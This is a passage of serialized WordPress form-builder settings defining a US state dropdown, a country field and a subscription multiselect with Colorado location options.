Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"46\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"47\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"48\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"49\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"50\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:51;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Washington DC\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"51\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:52;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:51:\"ARMED FORCES AFRICA \\ CANADA \\ EUROPE \\ MIDDLE EAST\";s:5:\"value\";s:2:\"AE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"52\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:53;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:36:\"ARMED FORCES AMERICA (EXCEPT CANADA)\";s:5:\"value\";s:2:\"AA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"53\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:54;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"ARMED FORCES PACIFIC\";s:5:\"value\";s:2:\"AP\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"54\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:11:\"field_label\";s:9:\"US States\";s:9:\"field_key\";s:23:\"liststate_1550094094681\";}s:2:\"id\";i:182;}i:5;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:11:\"listcountry\";s:5:\"label\";s:7:\"Country\";s:3:\"key\";s:25:\"listcountry_1550094096365\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";i:1;s:7:\"options\";a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:7:\"default\";s:2:\"US\";s:11:\"field_label\";s:7:\"Country\";s:9:\"field_key\";s:25:\"listcountry_1550094096365\";s:5:\"value\";s:2:\"US\";}s:2:\"id\";i:183;}i:6;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:27:\"Choose your subscription(s)\";s:4:\"type\";s:15:\"listmultiselect\";s:3:\"key\";s:40:\"choose_your_subscription_s_1550099095640\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:3:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Colorado Springs\";s:5:\"value\";s:16:\"Colorado Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:41:\"Central Colorado - ECK Temple in Colorado\";s:5:\"value\";s:41:\"Central Colorado - ECK Temple in Colorado\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 